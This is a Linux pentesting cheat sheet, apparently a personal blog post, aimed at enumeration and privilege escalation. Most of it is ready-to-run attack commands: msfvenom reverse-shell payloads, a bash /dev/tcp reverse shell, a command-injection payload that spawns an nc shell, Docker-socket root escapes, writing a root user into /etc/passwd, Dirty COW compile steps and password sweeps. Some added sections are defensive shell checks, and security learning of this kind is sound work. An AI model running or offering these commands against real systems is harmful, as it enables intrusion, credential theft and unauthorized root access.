Linux Cheatsheet
Tags: security, linux, cheats, tools, privesc

Writing a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I'm fully satisfied with the results. So I thought I would share some of my Linux cheats, which I use mostly for enumeration and privilege escalation. A lot of the following commands come from labs, cheatsheets, writeups, friends and colleagues, trial and error, and are also copied from famous places like HackTricks and ired.team.
Nmap
Aggressive scan with a combination of script categories. Nickname: Big Boy Scan
$ sudo nmap -A -sV -O --min-rate 600 --script "(vuln or exploit or auth) and not broadcast" -oA <rhost>-script <rhost> -p <ports>
Search and filter nmap scripts by category and keyword
$ locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
Run a script category against a specific port
$ nmap --script safe -p 445 <ip>
Python
Webserver
Spawn a webserver in current directory
$ python3 -m http.server <port>
Ports like 80, 443, 445 etc. need root privileges.
Upgrade shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
IMPORTANT - pay attention to which Python version is installed and used on the target system, if necessary:
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Virtual Environment
For some exploits, older Python versions like 2.7 work better; sometimes only the Python 2.7 version of an exploit works. In that case create the virtual environment with Python 2.
Create
Python 3
$ python3 -m venv /path/to/venv/MyVenv
Python 2
$ virtualenv -p /usr/bin/python2.7 MyVenv
Activate
$ source MyVenv/bin/activate
Deactivate (Both)
$ deactivate
Dirsearch
Two bash one-liners that open all HTTP 200 responses of a dirsearch run in Firefox. First, filter the target URL and the 200 responses:
$ grep -i '200\|Target' <file>
After pasting that output into a file, the second one-liner builds the full URLs and opens each one in Firefox (the `;` before `firefox &` matters, otherwise the whole command list would be backgrounded and `$file` would never be set in the current shell):
$ echo "Enter path to temporary file:"; read file; firefox & baseUrl=$(grep "Target: " "${file}" | awk -F "http" '{print $2}' | cut -d "^" -f 1) && baseUrl=${baseUrl%?} && grep -v "Last request to" "${file}" | grep "200 -" | cut -d "-" -f 3 | cut -d "^" -f 1 | sed "s/ //" | awk -v url="$baseUrl" '{print "firefox -url http" url $0}' | bash
Netcat
Connect
$ nc -vv <ip> <port>
Listen
$ nc -lvnp <port>
Shell
After Python Upgrade
# Reverse shell into the background
CTRL + Z
# Type into your local shell
stty raw -echo
# To open up the reverse shell again
fg
# To use clear and tab completion
export TERM=xterm
Restricted Shells (rbash)
$ ssh <user>@<ip> -t "bash --noprofile"
Write into /etc/passwd
<user>:$(openssl passwd -1 -salt <user> <password>):0:0:root:/bin/bash
Docker
Sometimes misconfigurations in Docker lead to easy privilege escalation. Membership in the docker group is a good indicator:
$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),122(docker)
Furthermore, LinPEAS also spots this quite well, with the following output:
[+] Analyzing .socket files
[...]
Docker socket /var/run/docker.sock is writable
[...]
Exploit
There are several ways to exploit this misconfiguration:
$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
$ sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
More of these can be found here: https://www.hackingarticles.in/docker-privilege-escalation/
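Added example, not from the original post: a check a host owner can run to confirm the Docker socket is not writable from an unprivileged account, which is the condition behind the `id` and LinPEAS indicators above. A socket counts as exposed when it is world-writable, or group-writable by a group the calling user belongs to. It assumes GNU stat (`-c`), as on most Linux hosts; the path and numeric group list are parameters so the logic can be exercised on a copy.

```shell
# docker_socket_exposed PATH [GIDS]
# Returns 0 if PATH is writable by the caller via other/group bits,
# 1 if not, 2 if PATH does not exist. GIDS defaults to the caller's groups.
docker_socket_exposed() {
    sock="$1"
    gidlist="${2:-$(id -G)}"
    [ -e "$sock" ] || return 2
    # stat prints e.g. "660 999": octal mode and numeric group owner.
    set -- $(stat -c '%a %g' "$sock")
    mode="$1"; grp="$2"
    # The last two printed digits are the group and other permission digits.
    other=$(( mode % 10 ))
    group=$(( mode / 10 % 10 ))
    # In an octal permission digit the write bit has value 2.
    [ $(( other & 2 )) -ne 0 ] && return 0
    if [ $(( group & 2 )) -ne 0 ]; then
        for g in $gidlist; do
            [ "$g" = "$grp" ] && return 0
        done
    fi
    return 1
}

# Human-readable wrapper for the default socket path.
report_docker_socket() {
    rc=0
    docker_socket_exposed /var/run/docker.sock || rc=$?
    case "$rc" in
        0) echo "WARNING: /var/run/docker.sock is writable by this user (equivalent to root)" ;;
        1) echo "OK: /var/run/docker.sock is not writable by this user" ;;
        *) echo "no Docker socket at /var/run/docker.sock" ;;
    esac
}
```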
Search for writable directories and passwords
$ find / -writable -type d 2>/dev/null
$ grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq
$ grep -Ri "password" /home /var/www /var/log 2>/dev/null | sort | uniq
MSFVENOM
PowerShell
$ msfvenom --platform windows -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f vba-psh
Java/JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f raw > shell.jsp
WAR (JSP)
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f war > shell.war
Creates an unstaged x86 shell
$ msfvenom -p windows/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe
Creates an unstaged x64 shell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe
Staged payload: windows/x64/meterpreter/reverse_tcp
Unstaged: windows/shell_reverse_tcp
More examples of MSFVenom reverse shells: MSFVenom Reverse Shell Cheatsheet
SSH
Troubleshooting the following SSH error
Unable to negotiate with <ip> port 22: no matching key exchange method found.
Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
- Check which authentication methods are allowed (password, key)
- If password-based authentication is allowed, use the following command with one of the offered algorithms
$ ssh -l bob <ip> -oKexAlgorithms=<one of the offered algorithms>
User management
Change user
$ su <username>
Files with root privileges
Use the following command to determine whether some program can be run as root:
$ sudo -l
(ROOT) /usr/bin/perl
Then execute it with the full path
$ sudo /usr/bin/perl <command>
A good read: https://gtfobins.github.io/
SUID BITS
Are there any interesting SUID bits?
If the binary is executable:
- Which commands does it use? Are files/directories modified or created?
- If you can modify the file, try to write a shell into it
- For example a bash reverse shell:
$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
If it's not executable:
- Try the strings command to see what the binary is doing or if there is any lead. Otherwise google the name of the binary. You can also look into https://gtfobins.github.io/
SSH Private Key
If the following error occurs
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'rsakey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "rsakey": bad permissions
Use chmod 600 on the private key.
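Added example, not from the original post: a small audit helper for the permission error above. ssh refuses a private key whose group/other permission bits are set; the helper applies the same rule to every private key in a directory and fixes offenders with the chmod 600 from the text. It assumes GNU stat (`-c`) and takes the directory as a parameter so it can be run against a test copy.

```shell
# key_perms_ok FILE -> 0 if only owner bits are set, 1 if too open, 2 if missing
key_perms_ok() {
    [ -f "$1" ] || return 2
    mode=$(stat -c '%a' "$1")      # e.g. 600 or 644
    case "$mode" in
        [0-7]00) return 0 ;;       # group and other digits are zero
        *) return 1 ;;
    esac
}

# audit_keys DIR -> prints every private key in DIR that is too open,
# returns 1 if any were found, 0 otherwise. Public keys (*.pub) are skipped.
audit_keys() {
    dir="$1"; bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        case "$f" in *.pub) continue ;; esac
        # Only files whose first line looks like a PEM/OpenSSH private key.
        head -n 1 "$f" | grep -q 'PRIVATE KEY' || continue
        if ! key_perms_ok "$f"; then
            echo "too open: $f ($(stat -c '%a' "$f"))"
            bad=1
        fi
    done
    return $bad
}

# fix_key_perms FILE -> owner read/write only, as ssh requires
fix_key_perms() {
    chmod 600 "$1"
}
```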
Command Injection
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
We can control $value in this command, and if we fill it with 'nc <ip> <port> -c bash;' it will open up a reverse shell.
Also interesting:
- Red Hat/CentOS root through network-scripts: under certain conditions, network interface names can be used for command injection.
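Added example, not from the original post: the `exec("nohup /bin/rm -f $path$value ...")` pattern from above rebuilt as a shell function, next to a hardened version. The bug is that the untrusted value is spliced into a command string that a second shell re-parses, so `;` and friends become commands; the fix passes the value as an argument the inner shell never re-parses, plus an allowlist check. The `nohup ... &` of the original is dropped here so the demo runs synchronously; the file names and payload are constructed.

```shell
# Vulnerable: the value is interpolated into a string that sh re-parses,
# so metacharacters (; | && $() ...) in $value turn into extra commands.
remove_unsafe() {
    path="$1"; value="$2"
    sh -c "rm -f ${path}${value} >/dev/null 2>&1"
}

# Hardened: the combined name is handed over as a positional parameter, so the
# inner shell treats it as one literal file name; "--" stops it from being read
# as an option (a value starting with "-" would otherwise be an rm flag).
remove_safe() {
    path="$1"; value="$2"
    sh -c 'rm -f -- "$1" >/dev/null 2>&1' _ "${path}${value}"
}

# Second layer: only accept a plain file name (no separators, no dotfiles).
is_valid_name() {
    case "$1" in
        ''|*/*|.*|*[!A-Za-z0-9._-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Demo with a constructed payload in a temp dir: prints "<unsafe_hit> <safe_hit>",
# where 1 means the injected command created the marker file.
demo() {
    d=$(mktemp -d)
    : > "$d/a"
    marker="$d/injected"
    payload="a; : > $marker"          # constructed: file name plus a second command
    remove_unsafe "$d/" "$payload"
    if [ -e "$marker" ]; then unsafe=1; else unsafe=0; fi
    rm -f "$marker"
    remove_safe "$d/" "$payload"
    if [ -e "$marker" ]; then safe=1; else safe=0; fi
    rm -rf "$d"
    echo "$unsafe $safe"
}
```

Expected output of demo is `1 0`: the string-splicing variant runs the second command, the argument-passing variant only tries to delete a file with a strange name.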
Kernel exploit
DirtyCow
There are many variants of Dirty COW, however the following two work most of the time
- 40839.c (Pokemon)
  - Compile with the following command
  $ gcc -pthread 40839.c -o <name> -lcrypt
  - This creates a user firefart and prompts for a password
- 40611.c (the "original" DirtyCow exploit)
  - Compile with the following command
  $ gcc -pthread 40611.c -o dirtcow
  - Asks for a file which needs to be modified. Ideally a new user is written into /etc/passwd
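Added example, not from the original post: a detection check for the /etc/passwd tampering this page mentions twice (the openssl passwd line under "Write into /etc/passwd" and the Dirty COW variants that add a user). It flags any UID 0 account other than root, any entry carrying a password hash directly in the passwd file instead of "x", and any empty password field. The file path is a parameter so it can be run against a constructed copy.

```shell
# find_passwd_anomalies [FILE] -> prints one line per suspicious entry
find_passwd_anomalies() {
    file="${1:-/etc/passwd}"
    awk -F: '
        # Field layout: name:password:uid:gid:gecos:home:shell
        $3 == 0 && $1 != "root" { print "extra uid 0 account: " $1 }
        $2 == ""                { print "empty password field: " $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" {
            print "password hash stored in passwd file: " $1
        }
    ' "$file"
}

# passwd_is_clean [FILE] -> 0 if nothing suspicious was found, 1 otherwise
passwd_is_clean() {
    [ -z "$(find_passwd_anomalies "$1")" ]
}
```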